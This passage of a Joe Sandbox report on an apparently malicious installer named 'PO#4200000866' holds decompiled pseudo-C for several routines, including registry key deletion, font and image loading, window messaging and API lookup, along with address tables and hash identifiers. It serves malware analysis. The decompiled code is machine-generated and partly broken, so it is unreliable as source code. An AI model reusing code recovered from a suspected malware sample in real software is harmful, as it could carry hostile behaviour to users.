                                                                                      						}
                                                                                      					}
                                                                                      					L9:
                                                                                      					_t37 = E715D12CC(0x715d5044);
                                                                                      					goto L10;
                                                                                      				}
                                                                                      			}











                                                                                      0x715d2494
                                                                                      0x715d2498
                                                                                      0x715d24a3
                                                                                      0x715d24a3
                                                                                      0x715d24aa
                                                                                      0x715d24af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d24b3
                                                                                      0x715d24b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d24bb
                                                                                      0x715d24c6
                                                                                      0x715d24d6
                                                                                      0x00000000
                                                                                      0x715d24cd
                                                                                      0x715d24cf
                                                                                      0x715d24e5
                                                                                      0x00000000
                                                                                      0x715d24e5
                                                                                      0x715d24bd
                                                                                      0x715d24bd
                                                                                      0x715d24e6
                                                                                      0x715d24e6
                                                                                      0x715d24e8
                                                                                      0x715d24ec
                                                                                      0x715d24ec
                                                                                      0x715d24ef
                                                                                      0x715d24ef
                                                                                      0x715d24f7
                                                                                      0x715d24ff
                                                                                      0x715d2502
                                                                                      0x715d25c1
                                                                                      0x715d25c2
                                                                                      0x715d25cd
                                                                                      0x715d25f7
                                                                                      0x715d25f7
                                                                                      0x715d25dd
                                                                                      0x715d25e9
                                                                                      0x715d25df
                                                                                      0x715d25df
                                                                                      0x715d25df
                                                                                      0x00000000
                                                                                      0x715d2508
                                                                                      0x715d2508
                                                                                      0x00000000
                                                                                      0x715d250f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2517
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2525
                                                                                      0x715d2527
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2548
                                                                                      0x715d254e
                                                                                      0x715d2551
                                                                                      0x715d2553
                                                                                      0x715d2563
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2530
                                                                                      0x715d2535
                                                                                      0x715d2538
                                                                                      0x715d2539
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d256f
                                                                                      0x715d2575
                                                                                      0x715d2576
                                                                                      0x715d2579
                                                                                      0x715d257a
                                                                                      0x715d257c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2588
                                                                                      0x715d258b
                                                                                      0x715d2597
                                                                                      0x715d2599
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d25a5
                                                                                      0x715d25b1
                                                                                      0x715d25b4
                                                                                      0x715d25b6
                                                                                      0x715d25b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2508
                                                                                      0x715d2502
                                                                                      0x715d24db
                                                                                      0x715d24e0
                                                                                      0x00000000
                                                                                      0x715d24e0

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D25C2
                                                                                        • Part of subcall function 715D12CC: lstrcpynW.KERNEL32(00000000,?,715D137F,00000019,715D11CA,-000000A0), ref: 715D12DC
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 715D2548
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 715D2563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: e453164f05e3709219aab474425d401abffa6228219804517b114fa5fc24b43b
                                                                                      • Instruction ID: c2d3ffc581fe5165919618dc88f5bd3253a478d2a81d80b01e41ce489b5d2d83
                                                                                      • Opcode Fuzzy Hash: e453164f05e3709219aab474425d401abffa6228219804517b114fa5fc24b43b
                                                                                      • Instruction Fuzzy Hash: 51417DB1109306DFD71DAF29D8C4E2A77F8FB84311F50895EE9DACA581EB30A548CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 48%
                                                                                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v536;
                                                                                      				void* _t27;
                                                                                      				signed int _t33;
                                                                                      				intOrPtr* _t35;
                                                                                      				signed int _t45;
                                                                                      				signed int _t46;
                                                                                      				signed int _t47;
                                                                                      
                                                                                      				_t46 = _a12;
                                                                                      				_t47 = _t46 & 0x00000300;
                                                                                      				_t45 = _t46 & 0x00000001;
                                                                                      				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                      				if(_t27 == 0) {
                                                                                      					if((_a12 & 0x00000002) == 0) {
                                                                                      						L3:
                                                                                      						_push(0x105);
                                                                                      						_push( &_v536);
                                                                                      						_push(0);
                                                                                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                      							__eflags = _t45;
                                                                                      							if(__eflags != 0) {
                                                                                      								L10:
                                                                                      								RegCloseKey(_v8);
                                                                                      								return 0x3eb;
                                                                                      							}
                                                                                      							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                      							__eflags = _t33;
                                                                                      							if(_t33 != 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_push(0x105);
                                                                                      							_push( &_v536);
                                                                                      							_push(_t45);
                                                                                      						}
                                                                                      						RegCloseKey(_v8);
                                                                                      						_t35 = E00406A35(3);
                                                                                      						if(_t35 != 0) {
                                                                                      							return  *_t35(_a4, _a8, _t47, 0);
                                                                                      						}
                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                      					}
                                                                                      					_v12 = 0;
                                                                                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}












                                                                                      0x00402eb4
                                                                                      0x00402ebd
                                                                                      0x00402ec6
                                                                                      0x00402ed2
                                                                                      0x00402edb
                                                                                      0x00402ee5
                                                                                      0x00402f0a
                                                                                      0x00402f10
                                                                                      0x00402f15
                                                                                      0x00402f16
                                                                                      0x00402f46
                                                                                      0x00402f1f
                                                                                      0x00402f21
                                                                                      0x00402f71
                                                                                      0x00402f74
                                                                                      0x00000000
                                                                                      0x00402f7a
                                                                                      0x00402f30
                                                                                      0x00402f35
                                                                                      0x00402f37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402f3f
                                                                                      0x00402f44
                                                                                      0x00402f45
                                                                                      0x00402f45
                                                                                      0x00402f52
                                                                                      0x00402f5a
                                                                                      0x00402f61
                                                                                      0x00000000
                                                                                      0x00402f8a
                                                                                      0x00000000
                                                                                      0x00402f69
                                                                                      0x00402ef5
                                                                                      0x00402f08
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402f08
                                                                                      0x00402f90

                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                      • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                      • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                      • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00401D81(void* __ebx, void* __edx) {
                                                                                      				struct HWND__* _t30;
                                                                                      				WCHAR* _t38;
                                                                                      				void* _t48;
                                                                                      				void* _t53;
                                                                                      				signed int _t55;
                                                                                      				signed int _t60;
                                                                                      				long _t63;
                                                                                      				void* _t65;
                                                                                      
                                                                                      				_t53 = __ebx;
                                                                                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                      				} else {
                                                                                      					E00402D84(2);
                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                      				}
                                                                                      				_t55 =  *(_t65 - 0x24);
                                                                                      				 *(_t65 + 8) = _t30;
                                                                                      				_t60 = _t55 & 0x00000004;
                                                                                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                      				if((_t55 & 0x00010000) == 0) {
                                                                                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                      				} else {
                                                                                      					_t38 = E00402DA6(0x11);
                                                                                      				}
                                                                                      				 *(_t65 - 0x44) = _t38;
                                                                                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                      				asm("sbb esi, esi");
                                                                                      				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                      					DeleteObject(_t48);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                      					_push(_t63);
                                                                                      					E004065AF();
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401d81
                                                                                      0x00401d85
                                                                                      0x00401d9a
                                                                                      0x00401d87
                                                                                      0x00401d89
                                                                                      0x00401d8f
                                                                                      0x00401d8f
                                                                                      0x00401da0
                                                                                      0x00401da3
                                                                                      0x00401dad
                                                                                      0x00401db0
                                                                                      0x00401db8
                                                                                      0x00401dc9
                                                                                      0x00401dcc
                                                                                      0x00401dd7
                                                                                      0x00401dce
                                                                                      0x00401dd0
                                                                                      0x00401dd0
                                                                                      0x00401ddb
                                                                                      0x00401de5
                                                                                      0x00401e0c
                                                                                      0x00401e1b
                                                                                      0x00401e29
                                                                                      0x00401e31
                                                                                      0x00401e39
                                                                                      0x00401e39
                                                                                      0x00401e42
                                                                                      0x00401e48
                                                                                      0x00402ba4
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                      • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                      • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                      • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 73%
                                                                                      			E00401E4E(intOrPtr __edx) {
                                                                                      				void* __edi;
                                                                                      				int _t9;
                                                                                      				signed char _t15;
                                                                                      				struct HFONT__* _t18;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t31;
                                                                                      				struct HDC__* _t33;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_t30 = __edx;
                                                                                      				_t33 = GetDC( *(_t35 - 8));
                                                                                      				_t9 = E00402D84(2);
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                      				ReleaseDC( *(_t35 - 8), _t33);
                                                                                      				 *0x40ce08 = E00402D84(3);
                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				 *0x40ce0f = 1;
                                                                                      				 *0x40ce0c = _t15 & 0x00000001;
                                                                                      				 *0x40ce0d = _t15 & 0x00000002;
                                                                                      				 *0x40ce0e = _t15 & 0x00000004;
                                                                                      				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                      				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                      				_push(_t18);
                                                                                      				_push(_t31);
                                                                                      				E004065AF();
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401e4e
                                                                                      0x00401e59
                                                                                      0x00401e5b
                                                                                      0x00401e68
                                                                                      0x00401e7f
                                                                                      0x00401e84
                                                                                      0x00401e91
                                                                                      0x00401e96
                                                                                      0x00401e9a
                                                                                      0x00401ea5
                                                                                      0x00401eac
                                                                                      0x00401ebe
                                                                                      0x00401ec4
                                                                                      0x00401ec9
                                                                                      0x00401ed3
                                                                                      0x00402638
                                                                                      0x0040156d
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2584051700-0
                                                                                      • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                      • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                      • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                      • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E715D16BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                      				_Unknown_base(*)()* _t7;
                                                                                      				void* _t10;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                      				_t7 = GetProcAddress(_a4, _t10);
                                                                                      				GlobalFree(_t10);
                                                                                      				return _t7;
                                                                                      			}






                                                                                      0x715d16d7
                                                                                      0x715d16e3
                                                                                      0x715d16f0
                                                                                      0x715d16f7
                                                                                      0x715d1700
                                                                                      0x715d170c

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,715D22D8,?,00000808), ref: 715D16D5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,715D22D8,?,00000808), ref: 715D16DC
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,715D22D8,?,00000808), ref: 715D16F0
                                                                                      • GetProcAddress.KERNEL32(715D22D8,00000000), ref: 715D16F7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D1700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 792c1bf8574c0a13b236fcde244e7ccf73bff33ce0c3dfc762429089fa68623f
                                                                                      • Instruction ID: 5f831e12b97952be71e9d861159735dfc6a75f41ef86e2735f3fb049c6247d7e
                                                                                      • Opcode Fuzzy Hash: 792c1bf8574c0a13b236fcde244e7ccf73bff33ce0c3dfc762429089fa68623f
                                                                                      • Instruction Fuzzy Hash: B4F01C7320A1387BD62016A78C8CDABBE9CDF8B2F5B220251F668E2190C6615C01DBF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 59%
                                                                                      			E00401C43(intOrPtr __edx) {
                                                                                      				int _t29;
                                                                                      				long _t30;
                                                                                      				signed int _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				long _t36;
                                                                                      				int _t41;
                                                                                      				signed int _t42;
                                                                                      				int _t46;
                                                                                      				int _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				struct HWND__* _t63;
                                                                                      				void* _t64;
                                                                                      
                                                                                      				_t57 = __edx;
                                                                                      				_t29 = E00402D84(3);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 - 0x18) = _t29;
                                                                                      				_t30 = E00402D84(4);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 + 8) = _t30;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                      				}
                                                                                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                      					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                      				_push(1);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t61 = E00402DA6();
                                                                                      					_t32 = E00402DA6();
                                                                                      					asm("sbb ecx, ecx");
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t35 =  ~( *_t31) & _t61;
                                                                                      					__eflags = _t35;
                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_t63 = E00402D84();
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t41 = E00402D84(2);
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                      					if(__eflags == 0) {
                                                                                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                      						L10:
                                                                                      						 *(_t64 - 0x38) = _t36;
                                                                                      					} else {
                                                                                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                      						asm("sbb eax, eax");
                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                      					_push( *(_t64 - 0x38));
                                                                                      					E004065AF();
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                      				return 0;
                                                                                      			}















                                                                                      0x00401c43
                                                                                      0x00401c45
                                                                                      0x00401c4c
                                                                                      0x00401c4f
                                                                                      0x00401c52
                                                                                      0x00401c5c
                                                                                      0x00401c60
                                                                                      0x00401c63
                                                                                      0x00401c6c
                                                                                      0x00401c6c
                                                                                      0x00401c6f
                                                                                      0x00401c73
                                                                                      0x00401c7c
                                                                                      0x00401c7c
                                                                                      0x00401c7f
                                                                                      0x00401c83
                                                                                      0x00401c85
                                                                                      0x00401cda
                                                                                      0x00401cdc
                                                                                      0x00401ce7
                                                                                      0x00401cf1
                                                                                      0x00401cf4
                                                                                      0x00401cf4
                                                                                      0x00401cfd
                                                                                      0x00000000
                                                                                      0x00401c87
                                                                                      0x00401c8e
                                                                                      0x00401c90
                                                                                      0x00401c93
                                                                                      0x00401c99
                                                                                      0x00401ca0
                                                                                      0x00401ca3
                                                                                      0x00401ccb
                                                                                      0x00401d03
                                                                                      0x00401d03
                                                                                      0x00401ca5
                                                                                      0x00401cb3
                                                                                      0x00401cbb
                                                                                      0x00401cbe
                                                                                      0x00401cbe
                                                                                      0x00401ca3
                                                                                      0x00401d06
                                                                                      0x00401d09
                                                                                      0x00401d0f
                                                                                      0x00402ba4
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                      • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                      • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                      • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				int _t24;
                                                                                      				char _t27;
                                                                                      				int _t30;
                                                                                      				void* _t32;
                                                                                      				intOrPtr _t33;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t37;
                                                                                      				void* _t39;
                                                                                      				void* _t42;
                                                                                      
                                                                                      				_t42 = __eflags;
                                                                                      				_t33 = __edx;
                                                                                      				_t30 = __ebx;
                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                      				_t34 = __eax;
                                                                                      				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                      				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                      				_t20 = E00402DA6(0x11);
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                                                      				 *(_t39 + 8) = _t21;
                                                                                      				if(_t21 != __ebx) {
                                                                                      					_t24 = 0;
                                                                                      					if(_t37 == 1) {
                                                                                      						E00402DA6(0x23);
